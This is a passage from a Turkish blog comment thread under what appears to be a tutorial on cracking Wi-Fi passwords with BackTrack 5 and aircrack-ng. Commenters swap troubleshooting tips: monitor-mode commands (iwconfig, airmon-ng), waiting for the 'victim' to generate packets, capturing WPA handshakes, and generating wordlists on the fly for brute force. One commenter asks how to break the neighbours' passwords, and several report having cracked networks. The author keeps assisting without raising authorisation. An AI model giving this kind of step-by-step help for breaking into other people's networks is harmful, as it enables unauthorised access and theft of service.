   2. WPS açığını deneyin
   3. WPA şifrelemeli ağı kırmaktan vazgeçin.
   4. Wordlist ile deneme yapın 🙂

 283. #450 Vedat KIZILDAĞ tarafından, tarihinde

  sayın Çeşmecioğlu;
  VM ware workstation 9 kanalı ile BackTrack5 r3 ü sanal disk üzerine kurdum.Bu durumda wireless kartımı görmedi.BackTrack 5 r3 ü laptoptan kaldırıp unetbootin kanalı ile flaş disk üzerinden kurulum yaptığımda wireless kartımı görüyor.
  Bu durumda sorun nerededir..?Ben sanal disk üzerinden çalışmak istiyorum.Çözüm nedir..?
  Saygılarımla……

 284. #452 Serkan tarafından, tarihinde

  Evet ben başarılı oldum. sıkıntı çektiğim noktaları size yazayım başınıza gelirse faydası olur.

  ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
  ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
  sure RFMON is enabled: run ‘airmon-ng start wlan0 ‘
  Sysfs injection support was not found either.

  Diye bir uyarı alıyorsanız, burada ısrarla airmon-ng start wlan0 komutunu çalıştırmanız isteniyo.
  Bu arada ben wlan0 kullandım hep, airmon-ng start wlan0 komutuyla parantez içindeki driver çıkmıyordu (mon0) olan şey.

  Herneyse ilk paragraftaki hatayı alıyorsanız wireless kartınız meşgul olduğu için moitör moduna geçmiyormuş.

  Kalblosuz ağ arayüzünün wlan0 olduğunu varsayarak devam ediyorum. Kablosuz ağ arayüzüne göre kodları değiştiriniz.

  sudo ifconfig wlan0 down
  sudo iwconfig wlan0 mode monitor (her satırı ayrı ayrı kodlayın) meşgulden düşürcez.
  sudo ifconfig wlan0 up

  Aşağıdaki kodla monitor modun aktif olup olmadığını kontrol ediniz.

  sudo iwconfig wlan0

  tekrar airmon-ng start wlan0 yazmanıza gerek yok heralde ama ben yine de yazıp sonraki adıma devam ettim.

  Bir de kendiniz trafik oluşturmayın. Paketleri kurbanın kendisi oluştursun. Kendi paketlerimle 500000 beşyüzbini geçtiği halde 5000 paket sonra tekrar deneyin diyordu. Sabahı bekleyip kendi haline bıraktım 13000 pakette sonus olumlu .. SEVGİLER

 285. #453 Computer Worm (ComWor) tarafından, tarihinde

  vmware de kurduğum zaman backtrack wifi kartını tanımıyor.
  bunun için driver mı yüklemeliyim
  word list nereden bulacam
  Şimdiden teşekkürler

  • #454 Murat Çeşmecioğlu tarafından, tarihinde

   Linux için olan driverları yüklemeniz gerekebilir.
   Wordlist’i birçok siteden bulabilirsiniz. Önceliğiniz Google.
   Kolay gelsin.

 286. #455 ali tarafından, tarihinde

  komşuların internetleri var bizimki yok
  nasıl şifreleri kırıp bağlana bilirim

 287. #457 ceyhun tarafından, tarihinde

  nerden indireceğim program yok

  • #458 Murat Çeşmecioğlu tarafından, tarihinde

   Program değil, farklı bir işletim sistemi. Google’da “Backtrack” yazıp aratırsanız ilk sonuçta bulabilirsiniz.

 288. #459 Murat tarafından, tarihinde

  Ustam ben VMware ile backtrack 5 r3 ü açıyorum ad şifre yazıp startx yazıp masa ustunu açıyorum orada konsolu açıp airmon-ng yazıyorum ama birşey çıkmıyor yani bulmuyor wlan0 ı driver de RAlink yazıyor kullanıyorum usp antenli modeli de flaxes 150m high gain usb wireless adapter
  sorun nedir ?

 289. #461 sinan tarafından, tarihinde

  cain & abel ile kırma teknikleri hakkında da bir paylaşımınız var mı

  • #462 Murat Çeşmecioğlu tarafından, tarihinde

   Hayır, malsefe yok. Cain&abel ile şifre kırmak için uygun bir kartım yok. Şifre kırmak için Linux sürümlerini tercih ediyorum.

 290. #463 metin beyaz tarafından, tarihinde

  HocAm crack için hangi usb wifiyi tavsiye edersin benim pc dell inspirion dw1502 kablosuz n wlan var. Ama wmware ile backtrack 5 r3 kurdum wifiyi airmoon yapmıyor. İnterface chipset diyor. Bende usb deb wifi almaya karar verdim. Bir tane önerirmisiniz acaba?

  • #464 Murat Çeşmecioğlu tarafından, tarihinde

   Rastgele elime gelen ve çok güzel çalışan bir model var: Tp-Link TL-WN722N

 291. #465 burak tarafından, tarihinde

  uzaktaki internete bağlanabilirmiyim pc den

 292. #467 samet öztürk tarafından, tarihinde

  ne olur murat bey yardımcı olun nerden indiriyoruz

  • #468 Murat Çeşmecioğlu tarafından, tarihinde

   Google’da “Backtrack” yazıp aratın, ilk çıkan sonuçtaki site Backtrack Linux’un resmi sitesidir.

 293. #469 ibrahim tarafından, tarihinde

  kardeş bende laptop var ondan olur mu illa wifi adaptör mü lazım. bide linux falan demişsin benm ki vista home basic sorun cıkar mı acaba

  • #470 Murat Çeşmecioğlu tarafından, tarihinde

   Bende de laptop var. Linux olduktan sonra sonuç çıkmaz. Aircrack’in Windows versiyonları çok sınırlı sayıdaki kartı destekliyor. Linux’u tavsiye ederim.

 294. #471 RAMAZAN tarafından, tarihinde

  800.000 data oldu hala ansıc yok key found F5F5F5F5F5F5 DİYE ĞÖSTERİYOR AMA ANSII YOK

 295. #473 ALİ tarafından, tarihinde

  bir tane wep şifreli wirelles var fakat ne zaman kırmayı denesem data yazan yer hep 0 oluyor hiç veri toplayamıyorum bunun bir çözümü var mı acaba teşekkürler

 296. #475 bilal tarafından, tarihinde

  Murat kardeşim. Ben wep için paket topladığım zaman data 100′ e çıkarken paket 100000 civarı oluyor ve aircrack-ng (*.cap) yazdığımda ise sadece dataya 100 yazıyor. Ve şifreyi kırmıyor.
  Wpa ve wpa2 de ise data çok hızlı ilerliyor fakat aircrack dediğim zaman no data yazıyor. Modem pc fule yakın çekmesine rağmen paket toplama sorunu var. Backtrack5 i sanal makine de kullanıyom. Bu sorunu nasıl halledebilirim.

  • #476 Murat Çeşmecioğlu tarafından, tarihinde

   WEP için önemli olan topladığı data sayısı. Fakat WPA ve WPA2’de handshake yakalamanız önemli. WPA ve WPA2 için wordlist’e de ihtiyacınız var. O yüzden WPA’da data toplaması önemli değil.

 297. #477 Sinan tarafından, tarihinde

  Merhaba murat bey fikirleriniz ve yardımlarınız çok etkileyici yalnız benim sorunumşifre kırma değil bunun tam tersi modemime mac filtreleme ve SSID gizli olacak şekilde uyguladım daha güvenli bir yöntem var mı? (Kablolu ağ dışında)

  • #478 Murat Çeşmecioğlu tarafından, tarihinde

   Teşekkür ederim. Uyguladığınız yöntemler bence gayet yeterli. SSID’yi, harf-rakam karışık ve uzun yapmanız brute-force ile kırılmasını zorlaştırır.

 298. #479 ali tarafından, tarihinde

  adapter kesın lazım mı adaptersızde sıfre kırılır mı?

 299. #481 slemaniyan tarafından, tarihinde

  ben 2 tane wpa 2 kırdım Wordlist için taktik geliştirmeniz lazm yani direk Wordlist oluşturan programı şifre bulucu programın içine atıcanız böylece Wordlist oluşturmanıza gerek kalmicak direk bi taraftan üretip bi taraftan denicek bütün olasılıkları deniyor teknik taktik ve strateji

  • #482 Murat Çeşmecioğlu tarafından, tarihinde

   Benzer programlar illaki vardır. Deneme yaparken biraz mantık ve tecrübeyle belirli şifreleri denetebilirsiniz.

 300. #483 slemaniyan tarafından, tarihinde

  kolay gele

 301. #484 Canakkale12 tarafından, tarihinde

  abi wirless ten gözüken ağların mac adreslerini (sadece) bulabileceğimiz program var mı kullanması zor olmayan

 302. #486 batuhan tarafından, tarihinde

  konuyla alakasız olarak sorum şu , mesleğiniz nedir ? konuyla alakalı olarak ise airmon-ng start wlan0 komutu ile kartımızı dinleme moduna ayarladıktan sonra işlem bittiginde dinlenme modundan otomatik mi çıkıcak yoksa elle müdahele gerekirmi ?

  • #487 Murat Çeşmecioğlu tarafından, tarihinde

   airmon-ng stop mon0 yazarak dinleme modundan çıkarabilirsiniz.
   Mesleğim çevre mühendisliği 🙂

 303. #488 ismailsezertasdelen tarafından, tarihinde

  ben wifi kirdim saol bilgilerin icin 🙂 murat abi bi sorum olacakti sana wifiye baglandigim internet hizi 54Mbps sence hizlimi

  • #489 Murat Çeşmecioğlu tarafından, tarihinde

   Bu hız modem ve sizin aranızdaki hız. Web sitelerini açarken sizin için yeterince hızlı ise sorun yok 🙂

 304. #490 Burak tarafından, tarihinde

  Abi bende chipset kolonunda hepsi unkloand yazıyor ama çevredeki wifileri görüyor BSSID ler gelmiyor ben bunu dediğim gibi chipsete bğlıyorum WİFİ adaptörüm inca ıuwa-150ws bt 3 destekliyo yazıyo fakat driveri yok içinde netten indirdim ve kurdum bu sefer airmon-ng sıkıntı verdi tamamen görmüyor Chipset 8187ı olmaz zorundamı benimkinin kutusunda yazmıyor çünkü

 305. #491 Cenk tarafından, tarihinde

  Olayı çok güzel anlatmışsınız, tane tane ve nedenleriyle birlikte. Çok teşekkürler.

Yorum Yazın

İsim (gerekli)

E-Posta (gerekli)

İnternet sitesi